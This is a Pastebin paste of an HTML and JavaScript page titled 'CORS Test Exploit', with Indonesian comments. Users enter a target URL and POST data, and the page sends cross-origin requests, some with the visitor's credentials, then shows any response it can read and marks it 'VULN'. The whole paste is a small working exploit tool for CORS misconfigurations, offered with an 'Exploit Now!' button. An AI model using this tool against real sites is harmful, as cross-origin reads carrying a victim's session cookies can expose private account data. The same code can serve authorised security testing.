API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Feb 20th, 2019
108
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.91 KB | None | 0 0
raw download clone embed print report
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4. <title>CORS Test Exploit</title>
  5. <link rel="SHORTCUT ICON" href="https://issuetracker.google.com/img/favicon.ico">
  6. <link rel="stylesheet" href="https://bootswatch.com/4/lumen/bootstrap.css" media="screen">
  7. </head>
  8. <body>
  9. <div class="container mt-4">
  10. <div class="col-md-6 border mx-auto p-4">
  11. <h3 class="text-center">CORS Test Exploit</h3>
  12. URL: <br/><input type="text" name="target" size="70" autocomplete="off"
  13. onkeypress="if(this.value.match(/document/)) this.value=this.value.replace(/\D/g,'')"
  14. onkeyup ="if(this.value.match(/document/)) this.value=this.value.replace(/\D/g,'')"
  15. ><br/>
  16. Post Data: <br/><input type="text" name="postdata" size="70" autocomplete="off"
  17. onkeypress="if(this.value.match(/document/)) this.value=this.value.replace(/\D/g,'')"
  18. onkeyup ="if(this.value.match(/document/)) this.value=this.value.replace(/\D/g,'')"
  19. ><br/> <br/>
  20. <!-- Method GET / POST tinggal ganti onclick() -->
  21. <button type="button" class="btn btn-info" type="submit" onclick="post()">Exploit Now!</button>
  22. <pre id="result"></pre>
  23. <script type="text/javascript">
  24. function get() {
  25. var url = document.getElementsByName("target")[0].value;
  26. var xhttp = new XMLHttpRequest();
  27. xhttp.onreadystatechange = function() {
  28. if (this.readyState == 4 && this.status == 200) {
  29. document.getElementById("result").innerHTML = '<br/><br/><pre>URL: '+url+'<br/>Response (Status : <kbd>VULN</kbd> | status code : <kbd>'+this.status+'</kbd>:<br><br><textarea style="margin: 0px; width: 411px; height: 436px;"">'+this.responseText+'</textarea></pre>'
  30. }else{
  31. document.getElementById("result").innerHTML = "<br/><br/><pre>URL: "+url+"<br/>Response (status : <kbd>Not Vuln</kbd>) : response tidak ada , status code <kbd>"+this.status+"</kbd></pre>";
  32. }
  33. };
  34. xhttp.open("GET", url, true);
  35. xhttp.withCredentials = true;
  36. xhttp.send();
  37. }
  38. function post() {
  39. var url = document.getElementsByName("target")[0].value;
  40. var data = document.getElementsByName("postdata")[0].value;
  41. var xhttp = new XMLHttpRequest();
  42. xhttp.onreadystatechange = function() {
  43. if (this.readyState == 4 && this.status == 200) {
  44. document.getElementById("result").innerHTML = '<br/><br/><pre>URL: '+url+'<br/>Response (Status : <kbd>VULN</kbd> | status code : <kbd>'+this.status+'</kbd>):<br><br><textarea style="margin: 0px; width: 411px; height: 436px;"">'+this.responseText+'</textarea></pre>'
  45. }else{
  46. document.getElementById("result").innerHTML = "<br/><br/><pre>URL: "+url+"<br/>Respons (status : <kbd>Not Vuln</kbd>) : response tidak ada , status code <kbd>"+this.status+"</kbd></pre>";
  47. }
  48. };
  49. xhttp.open("POST", url, true);
  50. xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  51. xhttp.send(data);
  52. }
  53. </script>
  54. </div>
  55. </div>
  56. </body>
  57. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!